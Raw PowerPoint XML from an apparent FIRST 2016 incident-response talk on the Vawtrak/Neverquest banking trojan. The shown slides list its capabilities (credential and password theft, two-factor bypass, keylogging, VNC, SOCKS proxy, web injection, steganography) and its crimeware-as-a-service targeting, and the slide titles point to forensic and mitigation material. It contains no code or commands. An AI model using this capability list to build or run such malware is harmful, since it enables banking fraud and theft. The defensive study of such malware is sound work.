            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0" smtClean="0"/>
              <a:t>Thunderbird</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="158633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786200"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Neverquest</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3200" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Text Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="340665" y="4307281"/>
            <a:ext cx="8478213" cy="579522"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>NeverQuest</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> will harvest any browser stored passwords</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74" y="1880609"/>
            <a:ext cx="4548571" cy="17142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754050"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Neverquest</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3200" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Text Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="340665" y="1768252"/>
            <a:ext cx="8478213" cy="3054061"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Steals Login Credentials for Banking, email and social media accounts</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Circumvents Two-Factor Authentication</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Steals Browser Stored Passwords</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Steals Private Keys</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Keylogging</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Encrypted Command-and-Control</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754050"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Neverquest</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3200" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Text Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="340666" y="1591427"/>
            <a:ext cx="8478213" cy="3729400"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Create VNC connections for remote access</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Create SOCKS proxy</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Screenshot captures</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Video captures</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Modify browser settings</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Web injection</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Powershell</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Steganography</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2217789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6" y="1014202"/>
            <a:ext cx="8478213" cy="882650"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>CrimeWare</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>-as-a-Service (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>CaaS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Text Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="340665" y="1639652"/>
            <a:ext cx="8478213" cy="3568650"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Targets can be selected by geographical region or language.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Targets can be selected by application, banking and financial, retail, social networks, etc.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Each instance of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Neverquest</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> contains a bot ID and a campaign ID. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Each victim system has a unique identifier.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="638268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IRST 2016 Slide Template - FINA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2014 Presentation - NG</Template>
  <TotalTime>9565</TotalTime>
  <Words>2480</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>On-screen Show (4:3)</PresentationFormat>
  <Paragraphs>284</Paragraphs>
  <Slides>42</Slides>
  <Notes>31</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2012_PPT_TEMPLATE Master Slide</vt:lpstr>
      <vt:lpstr>1_2012_PPT_TEMPLATE Master Slide</vt:lpstr>
      <vt:lpstr>FIRST 2016 Slide Template - FINAL</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Your Money Is My Money: The Dynamics of a Banking Trojan</vt:lpstr>
      <vt:lpstr>“Vawtrak is one of the most dangerous pieces of financial stealing malware detected…”     - Heimdal Security</vt:lpstr>
      <vt:lpstr>Neverquest</vt:lpstr>
      <vt:lpstr>Neverquest</vt:lpstr>
      <vt:lpstr>Neverquest</vt:lpstr>
      <vt:lpstr>Neverquest</vt:lpstr>
      <vt:lpstr>Neverquest</vt:lpstr>
      <vt:lpstr>CrimeWare-as-a-Service (CaaS)</vt:lpstr>
      <vt:lpstr>Delivery</vt:lpstr>
      <vt:lpstr>EQ Framework Injector</vt:lpstr>
      <vt:lpstr>EQ Framework Injector</vt:lpstr>
      <vt:lpstr>EQ Framework Injector</vt:lpstr>
      <vt:lpstr>EQ Framework Injector</vt:lpstr>
      <vt:lpstr>EQ Framework Injector</vt:lpstr>
      <vt:lpstr>Anti-AntiVirus</vt:lpstr>
      <vt:lpstr>Anti-AntiVirus</vt:lpstr>
      <vt:lpstr>Event Logs</vt:lpstr>
      <vt:lpstr>The Standard Forensic Approach</vt:lpstr>
      <vt:lpstr>Memory Analysis</vt:lpstr>
      <vt:lpstr>Memory Analysis</vt:lpstr>
      <vt:lpstr>Memory Analysis</vt:lpstr>
      <vt:lpstr>Memory Analysis</vt:lpstr>
      <vt:lpstr>Memory Analysis</vt:lpstr>
      <vt:lpstr>Memory Analysis</vt:lpstr>
      <vt:lpstr>Network Traffic</vt:lpstr>
      <vt:lpstr>Network Traffic</vt:lpstr>
      <vt:lpstr>Memory Analysis</vt:lpstr>
      <vt:lpstr>Registry</vt:lpstr>
      <vt:lpstr>Registry</vt:lpstr>
      <vt:lpstr>Registry</vt:lpstr>
      <vt:lpstr>Registry</vt:lpstr>
      <vt:lpstr>Keyword Searches</vt:lpstr>
      <vt:lpstr>Keyword Searches</vt:lpstr>
      <vt:lpstr>Going Mobile</vt:lpstr>
      <vt:lpstr>Latest Developments</vt:lpstr>
      <vt:lpstr>Anti-Forensics</vt:lpstr>
      <vt:lpstr>Mitigation</vt:lpstr>
      <vt:lpstr>For the Incident Responder</vt:lpstr>
      <vt:lpstr>References</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95</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2015-10-26T23:03:36Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2016-06-13T08:05:41Z</dcterms:modified>
</cp:coreProperties>
</file>